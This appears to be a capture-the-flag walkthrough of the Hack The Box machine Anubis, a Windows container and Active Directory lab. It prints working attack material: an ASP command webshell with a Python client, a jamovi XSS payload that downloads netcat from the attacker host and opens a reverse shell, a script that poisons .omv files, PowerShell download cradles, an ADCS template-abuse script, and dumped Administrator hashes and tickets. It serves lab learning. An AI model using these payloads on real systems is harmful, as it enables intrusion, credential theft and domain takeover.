Anubis: Hack The Box Walkthrough
source link: https://hackso.me/anubis-htb-walkthrough/
This post documents the complete walkthrough of Anubis, a retired vulnerable VM created by 4ndr34z, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
Background
Anubis is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan probe to establish the open ports on the host.
masscan -e tun0 -p1-65535,U:1-65535 10.10.11.102 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-16 03:46:36 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 593/tcp on 10.10.11.102
Discovered open port 443/tcp on 10.10.11.102
Discovered open port 49727/tcp on 10.10.11.102
Discovered open port 445/tcp on 10.10.11.102
Discovered open port 135/tcp on 10.10.11.102
Not much going on. Let’s do one better with nmap, scanning the discovered ports to establish their services.
nmap -n -v -Pn -p135,443,445,593,49727 -A --reason 10.10.11.102 -oN nmap.txt
...
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
443/tcp open ssl/http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=www.windcorp.htb
| Subject Alternative Name: DNS:www.windcorp.htb
| Issuer: commonName=www.windcorp.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-24T19:44:56
| Not valid after: 2031-05-24T19:54:56
| MD5: e2e7 86ef 4095 9908 14c5 3347 cdcb 4167
|_SHA-1: 7fce 781f 883c a27e 1154 4502 1686 ee65 7551 0e2a
|_ssl-date: 2021-08-16T04:07:24+00:00; 0s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
Notice that nmap’s http-title for the bare IP is "Not Found": the site is served by HTTP.sys (Microsoft-HTTPAPI/2.0), which dispatches requests by Host header, and the certificate names www.windcorp.htb. I’d better map www.windcorp.htb to 10.10.11.102 in /etc/hosts. This is what the site looks like.
Directory/File Enumeration
Let’s see what we can glean from gobuster and SecLists.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e -k -t 20 -x asp,txt -u https://www.windcorp.htb/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://www.windcorp.htb/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: asp,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/08/16 05:59:06 Starting gobuster in directory enumeration mode
===============================================================
https://www.windcorp.htb/test.asp (Status: 200) [Size: 518]
https://www.windcorp.htb/assets (Status: 301) [Size: 155] [--> https://www.windcorp.htb/assets/]
https://www.windcorp.htb/forms (Status: 301) [Size: 154] [--> https://www.windcorp.htb/forms/]
https://www.windcorp.htb/services.asp (Status: 200) [Size: 21596]
https://www.windcorp.htb/preview.asp (Status: 200) [Size: 3803]
https://www.windcorp.htb/save.asp (Status: 302) [Size: 157] [--> https://www.windcorp.htb/preview.asp]
https://www.windcorp.htb/readme.txt (Status: 200) [Size: 215]
https://www.windcorp.htb/changelog.txt (Status: 200) [Size: 1386]
===============================================================
2021/08/16 05:59:42 Finished
===============================================================
Contact
Interestingly, there’s a contact form that posts to save.asp, which in turn redirects to preview.asp. Suppose we send a message containing a short piece of ASP (VBScript) code. We see its output rendered in test.asp.
Looks like we are able to execute VBScript: the message body ends up in test.asp and is interpreted by the server rather than escaped.
ASP Webshell
Kali Linux has just the right ASP webshell for the job: /usr/share/webshells/asp/cmdasp.asp. It runs the POSTed .CMD value through cmd.exe, writes the output to a temporary file, and echoes it back HTML-encoded.
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
When we send the above in a message to save.asp, we get this in test.asp.
Whoa, it can’t be this easy, right?
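To turn the webshell into something scriptable, here is an added example (my code, not part of the original post and not part of Kali’s cmdasp.asp) of a small Python client. It assumes the injected page renders at https://www.windcorp.htb/test.asp and, like cmdasp.asp, takes its command from the POST field .CMD and prints the HTML-encoded output after a <PRE> tag that is never closed; the sample response in the block is constructed, not captured from the box.

```python
"""Client for a cmdasp.asp-style webshell (added example, not the post's code).

Assumptions: the shell is served at SHELL_URL, reads its command from the
POST field ".CMD" and writes Server.HTMLEncode'd output after a <PRE> tag
(cmdasp.asp never closes the tag, so we read to </PRE> or end of page).
"""
import html
import re
import ssl
import urllib.parse
import urllib.request

SHELL_URL = "https://www.windcorp.htb/test.asp"  # assumption: where the message is rendered

# Output sits after the <PRE> tag; cmdasp.asp emits no closing tag, so accept EOF too.
PRE_RE = re.compile(r"<PRE>(.*?)(?:</PRE>|\Z)", re.IGNORECASE | re.DOTALL)


def build_request(cmd, url=SHELL_URL):
    """Build the POST that cmdasp.asp's own form sends: a single '.CMD' field."""
    body = urllib.parse.urlencode({".CMD": cmd}).encode()
    return urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def parse_output(page):
    """Return the command output, HTML-unescaped and stripped, or '' if none."""
    m = PRE_RE.search(page)
    return html.unescape(m.group(1)).strip() if m else ""


def run(cmd, url=SHELL_URL):
    """Send one command and return its output (network call, not exercised offline)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # www.windcorp.htb presents a self-signed certificate
    with urllib.request.urlopen(build_request(cmd, url), context=ctx, timeout=15) as resp:
        return parse_output(resp.read().decode("utf-8", errors="replace"))


# Constructed response, shaped like cmdasp.asp's page after running `dir C:\`.
SAMPLE_RESPONSE = (
    '<FORM action="/test.asp" method="POST">'
    '<input type=text name=".CMD" size=45 value="dir C:\\">'
    '<input type=submit value="Run"></FORM>\r\n'
    "<PRE>\r\n Directory of C:\\\r\n\r\n"
    "08/16/2021  03:46 AM    &lt;DIR&gt;          temp\r\n"
    "08/16/2021  03:46 AM    &lt;DIR&gt;          inetpub\r\n"
)

if __name__ == "__main__":
    import sys
    print(run(" ".join(sys.argv[1:]) or "whoami"))
```

Run it as `python3 shell.py whoami` once the webshell is in place; parse_output is what makes the HTML-encoded <DIR> markers readable again.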
Windows Server Container
From the network configuration (the host sits at 172.21.132.45 with gateway 172.21.128.1, a typical NAT range for Windows containers), I think we are inside a Windows Server Container.
Foothold
Let’s download a copy of nc64.exe, save it as C:\temp\cute.exe, and run a reverse shell back to us.
A reverse shell appears in our netcat listener…
Breaking Out of a Windows Container
During enumeration of the container, I was lucky to find ConsoleHost_history.txt (PowerShell’s command history, kept under %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine), where the creator(s) were kind enough to leave clues on how to proceed.
Enter PowerProxy, a SOCKS proxy with reverse proxy capabilities. With PowerProxy, I’m able to set up a SOCKS4 proxy in the container, allowing me to port-scan hosts on the same network as the container that are otherwise not accessible to me. Recall the container’s IP address is 172.21.132.45 and the gateway’s IP address is 172.21.128.1? Normally the gateway is the host.
Run this on your machine.
python3 reverse_proxy_handler.py -p 8080
Run this in the container.
start powershell -c "Import-Module \temp\PowerProxy.ps1; Start-ReverseSocksProxy 10.10.14.64 -Port 8080"
Let’s scan ports commonly found in Windows.
proxychains -q nmap -sT -T4 -n -Pn 172.21.128.1 -p80,443,445,5985 --open 2>/dev/null
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-09 15:30 UTC
Nmap scan report for 172.21.128.1
Host is up (0.028s latency).
Not shown: 1 closed port
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds
This is what 80/tcp looks like.
Software Portal
The software offering looks interesting. The URL to 7-zip looks like this (to reach it, map softwareportal.windcorp.htb to 172.21.128.1 in /etc/hosts and browse through the SOCKS proxy).
http://softwareportal.windcorp.htb/install.asp?client=172.21.129.14&software=7z1900-x64.exe
What if I change the client IP address to my own and fire up tcpdump on tun0 with a filter to see what type of traffic comes in?
Interesting. The software portal is trying to connect to WinRM (5985/tcp) on my machine, and it authenticates to whatever answers there. Let’s give it what it wants. The latest version of Responder now offers a rogue WinRM server to capture NTLMv2 hashes.
Awesome. Let’s run the hash through JtR and see what we have.
We have a set of credentials (windcorp\localadmin:Secret123).
SMB Enumeration
Let’s see what we can glean with these credentials, especially what’s in Shared.
CVE-2021-28079 - Jamovi <= 1.6.18 Cross-Site Scripting Vulnerability
It’s no wonder: the creator of this box is one of the people who discovered this vulnerability. The column name is vulnerable to XSS in the ElectronJS framework, and because jamovi’s renderer exposes Node, the injected script can require child_process and execute arbitrary commands. An attacker can make an .OMV document containing a payload.
Notice the last-modification date of Whatif.omv in Shared\Documents\Analytics above is more recent than the rest of the .OMV files? I suspect there’s a scheduled task that opens Whatif.omv with a vulnerable Jamovi at some point in time.
Taking a leaf from the PoC video, we can change the column name in metadata.json (an .omv file is a zip archive, and metadata.json inside it holds the column definitions) to an XSS payload.
The XSS payload will fetch jamovi.js from Python’s http.server and hopefully Jamovi will execute the JS. This is what jamovi.js looks like.
// jamovi's Electron renderer exposes Node, so child_process is available to the injected script
const p = require("child_process");
// Stage 1: pull nc64.exe from the attacker's http.server into a directory every user can write to.
// Stage 2 runs in the callback so the reverse shell only starts once the download has finished.
p.exec("powershell -c iwr http://10.10.14.64:8000/nc64.exe -outf \\windows\\system32\\spool\\drivers\\color\\cute.exe", () => {
  p.exec("start \\windows\\system32\\spool\\drivers\\color\\cute.exe 10.10.14.64 4321 -e cmd.exe");
});
I’ve chosen to download nc64.exe from Python’s http.server, save it to a Windows world-writable folder (C:\Windows\System32\spool\drivers\color) as cute.exe, and then use it to run a reverse shell back to me.
The file user.txt is in diegocruz’s Desktop.
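Since the screenshot of the edited metadata.json is not reproduced here, the following added example (my code, not the box author’s and not jamovi’s) does the edit programmatically: it rewrites the first column name inside an .omv to the payload and re-zips the archive. It assumes that an .omv is a zip archive whose metadata.json keeps the column list under dataSet.fields[*].name (the jamovi 1.x layout), and that the payload is a <script> tag pointing at jamovi.js on the attacker’s http.server at 10.10.14.64:8000; the sample .omv built inside the block is constructed, not Whatif.omv.

```python
"""Plant the CVE-2021-28079 column-name payload in a jamovi .omv (added example).

Not the box author's or jamovi's code. Assumes: an .omv is a zip archive;
metadata.json inside it lists columns under dataSet.fields[*].name; the
payload is a <script> tag that loads jamovi.js from the attacker's
http.server (10.10.14.64:8000, as in the walkthrough).
"""
import io
import json
import zipfile

PAYLOAD = '<script src="http://10.10.14.64:8000/jamovi.js"></script>'  # assumption


def poison_metadata(meta, payload=PAYLOAD, column=0):
    """Rename one column to the payload; jamovi renders column names as HTML."""
    fields = meta["dataSet"]["fields"]
    if not fields:
        raise ValueError("metadata.json has no columns to rename")
    fields[column]["name"] = payload
    return meta


def poison_omv(omv_bytes, payload=PAYLOAD):
    """Return a new .omv with metadata.json patched and every other member copied as-is."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(omv_bytes)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == "metadata.json":
                meta = json.loads(data.decode("utf-8"))
                data = json.dumps(poison_metadata(meta, payload)).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


def column_names(omv_bytes):
    """Column names as jamovi would read them from metadata.json."""
    with zipfile.ZipFile(io.BytesIO(omv_bytes)) as zf:
        meta = json.loads(zf.read("metadata.json").decode("utf-8"))
    return [f["name"] for f in meta["dataSet"]["fields"]]


def member_names(omv_bytes):
    """Sorted archive member list, to confirm nothing but metadata.json changed."""
    with zipfile.ZipFile(io.BytesIO(omv_bytes)) as zf:
        return sorted(zf.namelist())


def make_sample_omv():
    """Constructed stand-in for Whatif.omv: two columns plus dummy members."""
    meta = {"dataSet": {"rowCount": 2, "columnCount": 2, "fields": [
        {"name": "Revenue", "columnType": "Data"},
        {"name": "Cost", "columnType": "Data"}]}}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("metadata.json", json.dumps(meta))
        zf.writestr("data.bin", b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    import sys  # usage: poison_omv.py Whatif.omv Whatif-poisoned.omv
    with open(sys.argv[1], "rb") as f:
        poisoned = poison_omv(f.read())
    with open(sys.argv[2], "wb") as f:
        f.write(poisoned)
```

Copying every other member byte-for-byte matters: jamovi has to open the document normally for the column header, and therefore the script tag, to be rendered.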
Privilege Escalation
During enumeration of diegocruz’s account, I notice that Active Directory Certificate Services (ADCS) is installed.
Certified Pre-Owned
Read SpecterOps’ Certified Pre-Owned paper for details on attacking misconfigured ADCS. Note that building Certify and Rubeus in Visual Studio is beyond the scope of this write-up.
Now check this out with Certify.exe find.
The domain group WINDCORP\webdevelopers has full control over the Web certificate template, and guess what: diegocruz is the only member of the group. In the paper’s terms this is ESC4 (write access to a template object), which we can turn into ESC1 by editing the template so that an enrollee may supply an arbitrary subject alternative name on a certificate that is valid for domain authentication.
Here’s the game plan.
- Reconfigure the Web template to issue certificates for Smartcard Logon with an enrollee-supplied subject
- Enroll as diegocruz with Administrator as the alternative name to get a certificate usable for Smartcard Logon
- Use Rubeus to obtain a TGT for Administrator via PKINIT and reveal the NTLM hash
- Profit!
Step 1 - Reconfigure Web template
Step 1 can be easily completed with the help of the PoshADCS cmdlet Set-ADCSTemplate (which depends on PowerView).
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/PowerView.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/ADCS.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.64/Reconfigure-Template.ps1")
Where Reconfigure-Template.ps1 is
$Properties = @{}
$Properties.Add('mspki-certificate-name-flag',1)   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: the requester picks subject and SAN
$Properties.Add('pkiextendedkeyusage',@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'))   # Smart Card Logon, Client Authentication
$Properties.Add('msPKI-Certificate-Application-Policy',@('1.3.6.1.4.1.311.20.2.2','1.3.6.1.5.5.7.3.2'))   # same EKUs as application policy
$Properties.Add('flags','CLEAR')   # 'CLEAR' empties the template's flags attribute
$Properties.Add('mspki-enrollment-flag',0)   # no CA manager approval (CT_FLAG_PEND_ALL_REQUESTS unset)
$Properties.Add('mspki-private-key-flag',256)   # CT_FLAG_USE_LEGACY_PROVIDER
$Properties.Add('pkidefaultkeyspec',1)   # AT_KEYEXCHANGE
Set-ADCSTemplate -Name Web -Properties $Properties -Force
After adding Smartcard Logon to Web certificate template this is what it looks like.
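As an added example (my code, not Certify’s or PoshADCS’s), here is the ESC1 test from Certified Pre-Owned written out in Python and applied to the template before and after Reconfigure-Template.ps1. The "after" dictionary carries exactly the values the script writes (name flag, enrollment flag, EKUs); the "before" dictionary assumes the Web template started out like the stock Web Server template (enrollee-supplied subject, Server Authentication EKU only), which the page does not show, and both assume msPKI-RA-Signature is 0 and that webdevelopers hold enrollment rights.

```python
"""ESC1 check for an AD CS certificate template (added example, not Certify's code).

Template attributes are the MS-CRTD values the walkthrough writes with
Set-ADCSTemplate; the "before" state is an assumption modelled on the stock
Web Server template.
"""

# msPKI-Certificate-Name-Flag bit: the requester supplies subject and SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1
# msPKI-Enrollment-Flag bit: requests wait for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x2

OID_SERVER_AUTH = "1.3.6.1.5.5.7.3.1"
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_ANY_PURPOSE = "2.5.29.37.0"
# EKUs a domain controller accepts for PKINIT / certificate-based logon.
AUTH_EKUS = {OID_CLIENT_AUTH, OID_SMARTCARD_LOGON, OID_PKINIT_CLIENT_AUTH, OID_ANY_PURPOSE}


def esc1_checks(t):
    """Evaluate each ESC1 precondition; every value must be True for the abuse to work."""
    ekus = set(t["ekus"])
    return {
        "low-priv principal can enroll": bool(t["low_priv_can_enroll"]),
        "no manager approval": not (t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures": t.get("ra_signatures", 0) == 0,
        "enrollee supplies SAN": bool(t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        # An empty EKU list means "any purpose", which also authenticates.
        "authentication EKU": not ekus or bool(ekus & AUTH_EKUS),
    }


def is_esc1(t):
    return all(esc1_checks(t).values())


def failing(t):
    """Names of the preconditions that currently block ESC1 on this template."""
    return [name for name, ok in esc1_checks(t).items() if not ok]


# Assumption: "Web" started out like the built-in Web Server template.
WEB_BEFORE = {
    "name": "Web",
    "low_priv_can_enroll": True,      # assumption: webdevelopers hold Enroll
    "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "enrollment_flag": 0,
    "ra_signatures": 0,               # assumption: msPKI-RA-Signature = 0
    "ekus": [OID_SERVER_AUTH],
}

# Exactly what Reconfigure-Template.ps1 writes for name flag, enrollment flag
# and pkiextendedkeyusage; enrollment rights and RA signatures as above.
WEB_AFTER = dict(WEB_BEFORE,
                 name_flag=1,
                 enrollment_flag=0,
                 ekus=[OID_SMARTCARD_LOGON, OID_CLIENT_AUTH])


if __name__ == "__main__":
    for t in (WEB_BEFORE, WEB_AFTER):
        print(t["name"], "ESC1" if is_esc1(t) else "blocked by " + ", ".join(failing(t)))
```

Under these assumptions the only precondition the original template lacked was an authentication EKU, which is why adding Smart Card Logon and Client Authentication is enough to let Certify mint a certificate for Administrator; setting CT_FLAG_PEND_ALL_REQUESTS on the template is the single change that would block the request again.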
Step 2 - Enroll Administrator to get a certificate for Smartcard Logon
Certify has a nifty feature for this step.
.\Certify.exe request /ca:earth.windcorp.htb\windcorp-CA /template:Web /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : WINDCORP\diegocruz
[*] No subject name specified, using current context as subject.
[*] Template : Web
[*] Subject : CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : earth.windcorp.htb\windcorp-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 3
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:17.0611875
Step 3 - Use Rubeus to reveal Administrator’s NTLM hash
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password123 /getcredentials
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'windcorp.htb\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/windcorp.htb
ServiceRealm : WINDCORP.HTB
UserName : Administrator
UserRealm : WINDCORP.HTB
StartTime : 10/11/2021 5:13:00 AM
EndTime : 10/11/2021 3:13:00 PM
RenewTill : 10/18/2021 5:13:00 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : oXPCzp1oL6+KG8FaJJO/Nw==
ASREP (key) : C9671F60EF5739FCCDDA8E0269D003D4
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 3CCC18280610C6CA3156F995B5899E09
Step 4 - Profit!
Armed with Administrator’s NTLM hash, all we need to do is use Impacket’s psexec.py to get us a shell by passing the hash (its -hashes option takes LM:NT, so the LM half can be left empty). Getting root.txt is a breeze.